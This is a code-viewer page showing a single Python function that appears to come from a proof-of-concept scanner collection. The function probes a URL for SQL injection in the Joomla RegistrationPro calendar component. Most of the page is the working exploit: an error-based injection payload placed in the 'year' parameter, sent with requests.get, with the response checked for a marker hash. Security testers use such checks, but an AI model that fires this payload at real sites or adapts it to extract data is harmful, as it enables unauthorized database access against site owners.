MCPcopy
hub / github.com/Xyntax/POC-T / poc

Function poc

script/joomla-registrationpro-sqli.py:23–38  ·  view source on GitHub ↗
(url)

Source from the content-addressed store, hash-verified

21
22
23def poc(url):
24 if '://' not in url:
25 url = 'http://' + url
26 for each in iterate_path(url):
27 plain, cipher = randomMD5(3)
28 payload = "/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=1 AND (SELECT 7804 FROM(SELECT COUNT(*),CONCAT(0x7176786b71,(MID((IFNULL(CAST(md5({plain}) AS CHAR),0x20)),1,54)),0x716b707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)".format(plain=plain)
29 if '?' in each:
30 continue
31 target_url = url.rstrip('/') + payload
32 try:
33 r = requests.get(target_url, timeout=10)
34 if cipher in r.content:
35 return each
36 except Exception, e:
37 pass
38 return False

Callers

nothing calls this directly

Calls 4

iterate_pathFunction · 0.90
randomMD5Function · 0.90
formatMethod · 0.80
getMethod · 0.80

Tested by

no test coverage detected